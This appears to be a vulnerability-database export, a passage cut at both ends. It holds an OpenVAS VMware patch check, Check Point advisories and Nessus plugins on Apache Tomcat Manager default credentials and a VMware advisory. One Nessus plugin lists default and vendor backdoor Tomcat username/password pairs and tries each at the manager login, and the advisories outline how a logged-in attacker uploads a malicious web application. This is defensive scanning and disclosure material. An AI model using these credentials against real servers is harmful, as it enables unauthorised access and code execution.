VE-2010-0844\",\"CVE-2010-0845\",\"CVE-2010-0846\",\"CVE-2010-0847\",\"CVE-2010-0848\",\"CVE-2010-0849\",\"CVE-2010-0850\",\"CVE-2010-0886\",\"CVE-2010-3556\",\"CVE-2010-3566\",\"CVE-2010-3567\",\"CVE-2010-3550\",\"CVE-2010-3561\",\"CVE-2010-3573\",\"CVE-2010-3565\",\"CVE-2010-3568\",\"CVE-2010-3569\",\"CVE-2010-1321\",\"CVE-2010-3548\",\"CVE-2010-3551\",\"CVE-2010-3562\",\"CVE-2010-3571\",\"CVE-2010-3554\",\"CVE-2010-3559\",\"CVE-2010-3572\",\"CVE-2010-3553\",\"CVE-2010-3549\",\"CVE-2010-3557\",\"CVE-2010-3541\",\"CVE-2010-3574\",\"CVE-2008-3825\",\"CVE-2009-1384\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version (\"$Revision: 7583 $\");\n script_name(\"VMSA-2011-0003.2 Third party component updates for VMware vCenter Server, vCenter Update Manager, ESXi and ESX\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-26 14:07:01 +0200 (Thu, 26 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-16 11:19:42 +0100 (Fri, 16 Mar 2012)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\",\"VMware/ESX/version\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"version_func.inc\"); # Used in _esxi_patch_missing()\ninclude(\"vmware_esx.inc\");\n\nif(!get_kb_item('VMware/ESXi/LSC'))exit(0);\nif(! esxVersion = get_kb_item(\"VMware/ESX/version\"))exit(0);\n\npatches = make_array(\"4.1.0\",\"ESXi410-201101201-SG\",\n \"4.0.0\",\"ESXi400-201103401-SG\");\n\nif(!patches[esxVersion])exit(0);\n\nif(_esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n\n security_message(port:0);\n exit(0);\n\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:39:43", "description": "HP Operations Manager is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. It monitors both physical and virtual servers to identify the root cause of event storms, allowing faster time to resolution at lower cost. It was formerly called OpenView Operations and is built upon the foundation of HP Network Node Manager (NNM). An unauthorized file upload vulnerability exists in HP Operations Manager. The vulnerability is due to insufficient access control within the Apache Tomcat Manager component. A remote attacker can leverage this vulnerability by sending a crafted HTTP request to /manager/html/upload using a set of default credentials. Once authenticated, the attacker can upload a malicious web application to a vulnerable system.", "cvss3": {}, "published": "2009-12-30T00:00:00", "type": "checkpoint_advisories", "title": "HP Operations Manager Server Unauthorized File Upload (CVE-2009-3548; CVE-2009-3843; CVE-2009-4189)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3548", "CVE-2009-3843", "CVE-2009-4189"], "modified": "2016-03-21T00:00:00", "id": "CPAI-2009-312", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:34:36", "description": "IBM Cognos Express is an integrated business intelligence (BI) and planning solution developed for midsized companies. It provides reporting, analysis, dashboard, scorecard, planning, budgeting and forecasting capabilities. A remote code execution vulnerability has been reported in IBM Cognos Express. The vulnerability is due to hard-coded user credentials, with manager-level permissions, installed by default in the user configuration of the bundled Tomcat server. A remote attacker can exploit this issue by using these credentials to connect to the vulnerable server over port 19300/TCP and deploy a malicious web application on a vulnerable system. Successful exploitation of this vulnerability could result in execution of arbitrary code on the vulnerable system.", "cvss3": {}, "published": "2010-05-24T00:00:00", "type": "checkpoint_advisories", "title": "IBM Cognos Server Backdoor Account Remote Code Execution (CVE-2010-0557)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0557"], "modified": "2015-11-10T00:00:00", "id": "CPAI-2010-364", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-04T20:12:19", "description": "A vulnerability exists in HP Performance Manager, a web-based analysis and visualization tool that analyzes performance trends of applications, systems, and services. HP Performance Manager incorporates Apache Tomcat 5 to help serve custom web applications. The vulnerability is due to insufficient access control within the Apache Tomcat Manager component. A remote attacker can leverage this vulnerability by sending a crafted HTTP request using a set of default credentials. Once authenticated, the attacker can upload a malicious web application to a vulnerable system.", "cvss3": {}, "published": "2010-06-25T00:00:00", "type": "checkpoint_advisories", "title": "Preemptive Protection against HP Performance Manager Apache Tomcat Policy Bypass", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3548"], "modified": "2010-01-01T00:00:00", "id": "CPAI-2010-134", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-10-16T15:46:23", "description": "Nessus was able to gain access to the Manager web application for the remote Tomcat server using a known set of credentials. A remote attacker can exploit this issue to install a malicious application on the affected server and run arbitrary code with Tomcat's privileges (usually SYSTEM on Windows, or the unprivileged 'tomcat' account on Unix). Note that worms are known to propagate this way.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2008-11-26T00:00:00", "type": "nessus", "title": "Apache Tomcat Manager Common Administrative Credentials", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-3099", "CVE-2009-3548", "CVE-2010-0557", "CVE-2010-4094"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_MANAGER_COMMON_CREDS.NASL", "href": "https://www.tenable.com/plugins/nessus/34970", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34970);\n script_version (\"1.39\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\n \"CVE-2009-3099\",\n \"CVE-2009-3548\",\n \"CVE-2010-0557\",\n \"CVE-2010-4094\"\n );\n script_bugtraq_id(\n 36253,\n 36954,\n 37086,\n 38084,\n 44172\n );\n script_xref(name:\"EDB-ID\", value:\"18619\");\n script_xref(name:\"EDB-ID\", value:\"31433\");\n script_xref(name:\"ZDI\", value:\"ZDI-10-214\");\n\n script_name(english:\"Apache Tomcat Manager Common Administrative Credentials\");\n script_summary(english:\"Try common passwords for Tomcat.\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The management console for the remote web server is protected using a\nknown set of credentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to gain access to the Manager web application for the\nremote Tomcat server using a known set of credentials. A remote\nattacker can exploit this issue to install a malicious application on\nthe affected server and run arbitrary code with Tomcat's privileges\n(usually SYSTEM on Windows, or the unprivileged 'tomcat' account on\nUnix). Note that worms are known to propagate this way.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://markmail.org/thread/wfu4nff5chvkb6xp\");\n script_set_attribute(attribute:\"see_also\", value:\"http://svn.apache.org/viewvc?view=revision&revision=834047\");\n # https://web.archive.org/web/20091221100437/http://www.intevydis.com/blog/?p=87\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e7339edb\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-10-214/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2010/Oct/259\");\n script_set_attribute(attribute:\"solution\", value:\n\"Edit the associated 'tomcat-users.xml' file and change or remove the\naffected set of credentials.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Tomcat Manager Authenticated Upload Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(255);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/11/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK); \n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english: \"Web Servers\");\n\n script_dependencies(\"tomcat_error_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"installed_sw/Apache Tomcat\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"install_func.inc\");\n\nif (supplied_logins_only)\n audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nget_install_count(app_name:\"Apache Tomcat\", exit_if_zero:TRUE);\nport = get_http_port(default:8080);\ninstall = get_single_install(app_name:\"Apache Tomcat\", port:port);\n\nn = 0;\nuser[n] = \"tomcat\";\tpass[n++] = \"tomcat\";\nuser[n] = \"tomcat\";\tpass[n++] = \"\";\nuser[n] = \"tomcat\"; pass[n++] = \"admin\";\nuser[n] = \"admin\";\tpass[n++] = \"admin\";\nuser[n] = \"admin\";\tpass[n++] = \"\";\nuser[n] = \"admin\";\tpass[n++] = \"password\";\nuser[n] = \"password\";\tpass[n++] = \"password\";\n# HP Operations Manager 8.10 (BID 37086)\nuser[n] = \"ovwebusr\"; pass[n++] = \"OvW*busr1\";\nuser[n] = \"j2deployer\"; pass[n++] = \"j2deployer\";\n# IBM Cognos Express (BID 38084)\nuser[n] = \"cxsdk\"; pass[n++] = \"kdsxc\";\n# IBM Rational Quality Manager and Test Lab Manager (CVE-2010-4094 / BID 44172)\nuser[n] = \"ADMIN\"; pass[n++] = \"ADMIN\";\nuser[n] = \"manager\"; pass[n++] = \"manager\"; # WaveMaker 6.4, and probably several other apps\nuser[n] = \"admin\"; pass[n++] = \"tomcat\";\nuser[n] = \"admin\"; pass[n++] = \"j5Brn9\";\nuser[n] = \"both\"; pass[n++] = \"tomcat\";\nuser[n] = \"role\"; pass[n++] = \"changethis\";\nuser[n] = \"role1\"; pass[n++] = \"role1\";\nuser[n] = \"role1\"; pass[n++] = \"tomcat7\";\nuser[n] = \"root\"; pass[n++] = \"root\";\nuser[n] = \"root\"; pass[n++] = \"changethis\";\nuser[n] = \"root\"; pass[n++] = \"owaspbwa\"; # OWASP Broken Web Applications\nuser[n] = \"tomcat\"; pass[n++] = \"changethis\";\nuser[n] = \"xampp\"; pass[n++] = \"xampp\";\nuser[n] = \"tomcat\"; pass[n++] = \"s3cret\";\nuser[n] = \"QCC\"; pass[n++] = \"QLogic66\"; # QLogic QConvergeConsole\n\nfunction test(port, user, pass, page)\n{\n local_var\tr;\n\n r = http_send_recv3(\n port : port,\n username : user,\n password : pass,\n method : \"GET\",\n item : \"/\" + page,\n exit_on_fail : TRUE\n );\n\n if (r[0] !~ \"^HTTP/1\\.[01] 200 \") return 0;\n if (\"Apache Software Foundation\" >!< r[2]) return 0;\n\n if (r[2] !~ \"AutoDeploy|(deploy|install)Config|>Tomcat Version<|DeployXML|(deploy|install)War\") return 0;\n\n return 1;\n}\n\nurls = make_list(\"manager/html\", \"host-manager/html\", \"manager/status\");\n\ninstall = build_url(port: port, qs:\"\");\nreport = '';\n\nforeach u (urls)\n{\n clear_cookiejar();\n\n r = http_send_recv3(\n port : port,\n method : \"GET\",\n item : \"/\" + u,\n username : \"\",\n password : \"\",\n exit_on_fail : TRUE\n );\n\n if (r[0] !~ \"^HTTP/1\\.[01] 401 \") continue;\n if (r[1] !~ \"Tomcat (Host )?Manager Application\") continue;\n\n for (i = 0; i < n; i ++)\n {\n if (test(port: port, user: user[i], pass: pass[i], page: u))\n {\n report +=\n '\\n URL : ' + install + u +\n '\\n Username : ' + user[i] +\n '\\n Password : ' + pass[i] + '\\n';\n break;\n }\n }\n}\n\nif (!empty_or_null(report))\n{\n report1 = '\\nIt was possible to log into the Tomcat Manager web app using the\\nfollowing info :\\n' + report;\n security_hole(port:port, extra:report1);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Apache Tomcat\", port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-31T14:11:06", "description": "a. vCenter Server and vCenter Update Manager update Microsoft SQL Server 2005 Express Edition to Service Pack 3\n\n Microsoft SQL Server 2005 Express Edition (SQL Express) distributed with vCenter Server 4.1 Update 1 and vCenter Update Manager 4.1 Update 1 is upgraded from SQL Express Service Pack 2 to SQL Express Service Pack 3, to address multiple security issues that exist in the earlier releases of Microsoft SQL Express.\n\n Customers using other database solutions need not update for these issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2008-5416, CVE-2008-0085, CVE-2008-0086, CVE-2008-0107 and CVE-2008-0106 to the issues addressed in MS SQL Express Service Pack 3.\n\nb. vCenter Apache Tomcat Management Application Credential Disclosure\n\n The Apache Tomcat Manager application configuration file contains logon credentials that can be read by unprivileged local users.\n\n The issue is resolved by removing the Manager application in vCenter 4.1 Update 1.\n\n If vCenter 4.1 is updated to vCenter 4.1 Update 1 the logon credentials are not present in the configuration file after the update.\n\n VMware would like to thank Claudio Criscione of Secure Networking for reporting this issue to us.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2010-2928 to this issue.\n\nc. vCenter Server and ESX, Oracle (Sun) JRE is updated to version 1.6.0_21\n\n Oracle (Sun) JRE update to version 1.6.0_21, which addresses multiple security issues that existed in earlier releases of Oracle (Sun) JRE.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following names to the security issues fixed in Oracle (Sun) JRE 1.6.0_19: CVE-2009-3555, CVE-2010-0082, CVE-2010-0084, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088, CVE-2010-0089, CVE-2010-0090, CVE-2010-0091, CVE-2010-0092, CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837, CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841, CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845, CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849, CVE-2010-0850.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following name to the security issue fixed in Oracle (Sun) JRE 1.6.0_20: CVE-2010-0886.\n\nd. vCenter Update Manager Oracle (Sun) JRE is updated to version 1.5.0_26\n\n Oracle (Sun) JRE update to version 1.5.0_26, which addresses multiple security issues that existed in earlier releases of Oracle (Sun) JRE.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following names to the security issues fixed in Oracle (Sun) JRE 1.5.0_26: CVE-2010-3556, CVE-2010-3566, CVE-2010-3567, CVE-2010-3550, CVE-2010-3561, CVE-2010-3573, CVE-2010-3565,CVE-2010-3568, CVE-2010-3569, CVE-2009-3555, CVE-2010-1321, CVE-2010-3548, CVE-2010-3551, CVE-2010-3562, CVE-2010-3571, CVE-2010-3554, CVE-2010-3559, CVE-2010-3572, CVE-2010-3553, CVE-2010-3549, CVE-2010-3557, CVE-2010-3541, CVE-2010-3574.\n\ne. vCenter Server and ESX Apache Tomcat updated to version 6.0.28\n\n Apache Tomcat updated to version 6.0.28, which addresses multiple security issues that existed in earlier releases of Apache Tomcat\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following names to the security issues fixed in Apache Tomcat 6.0.24: CVE-2009-2693, CVE-2009-2901, CVE-2009-2902,i and CVE-2009-3548.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following names to the security issues fixed in Apache Tomcat 6.0.28: CVE-2010-2227, CVE-2010-1157.\n\nf. vCenter Server third-party component OpenSSL updated to version 0.9.8n\n\n The version of the OpenSSL library in vCenter Server is updated to 0.9.8n.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2010-0740 and CVE-2010-0433 to the issues addressed in this version of OpenSSL.\n\ng. ESX third-party component OpenSSL updated to version 0.9.8p\n\n The version of the ESX OpenSSL library is updated to 0.9.8p.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2010-3864 and CVE-2010-2939 to the issues addressed in this update.\n\nh. ESXi third-party component cURL updated\n\n The version of cURL library in ESXi is updated.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2010-0734 to the issues addressed in this update.\n\ni. ESX third-party component pam_krb5 updated\n\n The version of pam_krb5 library is updated.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2008-3825 and CVE-2009-1384 to the issues addressed in the update.\n\nj. ESX third-party update for Service Console kernel\n\n The Service Console kernel is updated to include kernel version 2.6.18-194.11.1.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2010-1084, CVE-2010-2066, CVE-2010-2070, CVE-2010-2226, CVE-2010-2248, CVE-2010-2521, CVE-2010-2524, CVE-2010-0008, CVE-2010-0415, CVE-2010-0437, CVE-2009-4308, CVE-2010-0003, CVE-2010-0007, CVE-2010-0307, CVE-2010-1086, CVE-2010-0410, CVE-2010-0730, CVE-2010-1085, CVE-2010-0291, CVE-2010-0622, CVE-2010-1087, CVE-2010-1173, CVE-2010-1437, CVE-2010-1088, CVE-2010-1187, CVE-2010-1436, CVE-2010-1641, and CVE-2010-3081 to the issues addressed in the update.\n\n Notes :\n - The update also addresses the 64-bit compatibility mode stack pointer underflow issue identified by CVE-2010-3081. This issue was patched in an ESX 4.1 patch prior to the release of ESX 4.1 Update 1 and in a previous ESX 4.0 patch release.\n - The update also addresses CVE-2010-2240 for ESX 4.0.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2011-02-14T00:00:00", "type": "nessus", "title": "VMSA-2011-0003 : Third-party component updates for VMware vCenter Server, vCenter Update Manager, ESXi and ESX", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-0085", "CVE-2008-0086", "CVE-2008-0106", "CVE-2008-0107", "CVE-2008-3825", "CVE-2008-5416", "CVE-2009-1384", "CVE-2009-2693", "CVE-2009-2901", "CVE-2009-2902", "CVE-2009-3548", "CVE-2009-3555", "CVE-2009-4308", "CVE-2010-0003", "CVE-2010-0007", "CVE-2010-0008", "CVE-2010-0082", "CVE-2010-0084", "CVE-2010-0085", "CVE-2010-0087", "CVE-2010-0088", "CVE-2010-0089", "CVE-2010-0090", "CVE-2010-0091", "CVE-2010-0092", "CVE-2010-0093", "CVE-2010-0094", "CVE-2010-0095", "CVE-2010-0291", "CVE-2010-0307", "CVE-2010-0410", "CVE-2010-0415", "CVE-2010-0433", "CVE-2010-0437", "CVE-2010-0622", "CVE-2010-0730", "CVE-2010-0734", "CVE-2010-0740", "CVE-2010-0837", "CVE-2010-0838", "CVE-2010-0839", "CVE-2010-0840", "CVE-2010-0841", "CVE-2010-0842", "CVE-2010-0843", "CVE-2010-0844", "CVE-2010-0845", "CVE-2010-0846", "CVE-2010-0847", "CVE-2010-0848", "CVE-2010-0849", "CVE-2010-0850", "CVE-2010-0886", "CVE-2010-1084", "CVE-2010-1085", "CVE-2010-1086", "CVE-2010-1087", "CVE-2010-1088", "CVE-2010-1157", "CVE-2010-1173", "CVE-2010-1187", "CVE-2010-1321", "CVE-2010-1436", "CVE-2010-1437", "CVE-2010-1641", "CVE-2010-2066", "CVE-2010-2070", "CVE-2010-2226", "CVE-2010-2227", "CVE-2010-2240", "CVE-2010-2248", "CVE-2010-2521", "CVE-2010-2524", "CVE-2010-2928", "CVE-2010-2939", "CVE-2010-3081", "CVE-2010-3541", "CVE-2010-3548", "CVE-2010-3549", "CVE-2010-3550", "CVE-2010-3551", "CVE-2010-3553", "CVE-2010-3554", "CVE-2010-3556", "CVE-2010-3557", "CVE-2010-3559", "CVE-2010-3561", "CVE-2010-3562", "CVE-2010-3565", "CVE-2010-3566", "CVE-2010-3567", "CVE-2010-3568", "CVE-2010-3569", "CVE-2010-3571", "CVE-2010-3572", "CVE-2010-3573", "CVE-2010-3574", "CVE-2010-3864"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:vmware:esx:4.0", "cpe:/o:vmware:esx:4.1", "cpe:/o:vmware:esxi:4.0", "cpe:/o:vmware:esxi:4.1"], "id": "VMWARE_VMSA-2011-0003.NASL", "href": "https://www.tenable.com/plugins/nessus/51971", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2011-0003. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51971);\n script_version(\"1.46\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2008-0085\",\n \"CVE-2008-0086\",\n \"CVE-2008-0106\",\n \"CVE-2008-0107\",\n \"CVE-2008-3825\",\n \"CVE-2008-5416\",\n \"CVE-2009-1384\",\n \"CVE-2009-2693\",\n \"CVE-2009-2901\",\n \"CVE-2009-2902\",\n \"CVE-2009-3548\",\n \"CVE-2009-3555\",\n \"CVE-2009-4308\",\n \"CVE-2010-0003\",\n \"CVE-2010-0007\",\n \"CVE-2010-0008\",\n \"CVE-2010-0082\",\n \"CVE-2010-0084\",\n \"CVE-2010-0085\",\n \"CVE-2010-0087\",\n \"CVE-2010-0088\",\n \"CVE-2010-0089\",\n \"CVE-2010-0090\",\n \"CVE-2010-0091\",\n \"CVE-2010-0092\",\n \"CVE-2010-0093\",\n \"CVE-2010-0094\",\n \"CVE-2010-0095\",\n \"CVE-2010-0291\",\n \"CVE-2010-0307\",\n \"CVE-2010-0410\",\n \"CVE-2010-0415\",\n \"CVE-2010-0433\",\n \"CVE-2010-0437\",\n \"CVE-2010-0622\",\n \"CVE-2010-0730\",\n \"CVE-2010-0734\",\n \"CVE-2010-0740\",\n \"CVE-2010-0837\",\n \"CVE-2010-0838\",\n \"CVE-2010-0839\",\n \"CVE-2010-0840\",\n \"CVE-2010-0841\",\n \"CVE-2010-0842\",\n \"CVE-2010-0843\",\n \"CVE-2010-0844\",\n \"CVE-2010-0845\",\n \"CVE-2010-0846\",\n \"CVE-2010-0847\",\n \"CVE-2010-0848\",\n \"CVE-2010-0849\",\n \"CVE-2010-0850\",\n \"CVE-2010-0886\",\n \"CVE-2010-1084\",\n \"CVE-2010-1085\",\n \"CVE-2010-1086\",\n \"CVE-2010-1087\",\n \"CVE-2010-1088\",\n \"CVE-2010-1157\",\n \"CVE-2010-1173\",\n \"CVE-2010-1187\",\n \"CVE-2010-1321\",\n \"CVE-2010-1436\",\n \"CVE-2010-1437\",\n \"CVE-2010-1641\",\n \"CVE-2010-2066\",\n \"CVE-2010-2070\",\n \"CVE-2010-2226\",\n \"CVE-2010-2227\",\n \"CVE-2010-2240\",\n \"CVE-2010-2248\",\n \"CVE-2010-2521\",\n \"CVE-2010-2524\",\n \"CVE-2010-2928\",\n \"CVE-2010-2939\",\n \"CVE-2010-3081\",\n \"CVE-2010-3541\",\n \"CVE-2010-3548\",\n \"CVE-2010-3549\",\n \"CVE-2010-3550\",\n \"CVE-2010-3551\",\n \"CVE-2010-3553\",\n \"CVE-2010-3554\",\n \"CVE-2010-3556\",\n \"CVE-2010-3557\",\n \"CVE-2010-3559\",\n \"CVE-2010-3561\",\n \"CVE-2010-3562\",\n \"CVE-2010-3565\",\n \"CVE-2010-3566\",\n \"CVE-2010-3567\",\n \"CVE-2010-3568\",\n \"CVE-2010-3569\",\n \"CVE-2010-3571\",\n \"CVE-2010-3572\",\n \"CVE-2010-3573\",\n \"CVE-2010-3574\",\n \"CVE-2010-3864\"\n );\n script_bugtraq_id(\n 30082,\n 30083,\n 30118,\n 30119,\n 31534,\n 32710,\n 35112,\n 36935,\n 36954,\n 37724,\n 37762,\n 37906,\n 37942,\n 37944,\n 37945,\n 38027,\n 38058,\n 38144,\n 38162,\n 38165,\n 38185,\n 38348,\n 38479,\n 38533,\n 38857,\n 38898,\n 39013,\n 39044,\n 39062,\n 39067,\n 39068,\n 39069,\n 39070,\n 39071,\n 39072,\n 39073,\n 39075,\n 39077,\n 39078,\n 39081,\n 39082,\n 39083,\n 39084,\n 39085,\n 39086,\n 39088,\n 39089,\n 39090,\n 39091,\n 39093,\n 39094,\n 39095,\n 39096,\n 39120,\n 39492,\n 39569,\n 39635,\n 39715,\n 39719,\n 39794,\n 39979,\n 40235,\n 40356,\n 40776,\n 40920,\n 41466,\n 41544,\n 41904,\n 42242,\n 42249,\n 42306,\n 43239,\n 43965,\n 43971,\n 43979,\n 43985,\n 43988,\n 43992,\n 43994,\n 44009,\n 44011,\n 44012,\n 44013,\n 44014,\n 44016,\n 44017,\n 44026,\n 44027,\n 44028,\n 44030,\n 44032,\n 44035,\n 44040,\n 44884\n );\n script_xref(name:\"VMSA\", value:\"2011-0003\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"VMSA-2011-0003 : Third-party component updates for VMware vCenter Server, vCenter Update Manager, ESXi and ESX\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESXi / ESX host is missing one or more\nsecurity-related patches.\");\n script_set_attribute(attribute:\"description\", value:\n\"a. vCenter Server and vCenter Update Manager update Microsoft\n SQL Server 2005 Express Edition to Service Pack 3\n\n Microsoft SQL Server 2005 Express Edition (SQL Express)\n distributed with vCenter Server 4.1 Update 1 and vCenter Update\n Manager 4.1 Update 1 is upgraded from SQL Express Service Pack 2\n to SQL Express Service Pack 3, to address multiple security\n issues that exist in the earlier releases of Microsoft SQL Express.\n\n Customers using other database solutions need not update for\n these issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2008-5416, CVE-2008-0085, CVE-2008-0086,\n CVE-2008-0107 and CVE-2008-0106 to the issues addressed in MS SQL\n Express Service Pack 3.\n\nb. vCenter Apache Tomcat Management Application Credential Disclosure\n\n The Apache Tomcat Manager application configuration file contains\n logon credentials that can be read by unprivileged local users.\n\n The issue is resolved by removing the Manager application in\n vCenter 4.1 Update 1.\n\n If vCenter 4.1 is updated to vCenter 4.1 Update 1 the logon\n credentials are not present in the configuration file after the\n update.\n\n VMware would like to thank Claudio Criscione of Secure Networking\n for reporting this issue to us.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2010-2928 to this issue.\n\nc. vCenter Server and ESX, Oracle (Sun) JRE is updated to version\n 1.6.0_21\n\n Oracle (Sun) JRE update to version 1.6.0_21, which addresses\n multiple security issues that existed in earlier releases of\n Oracle (Sun) JRE.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the following names to the security issues fixed in\n Oracle (Sun) 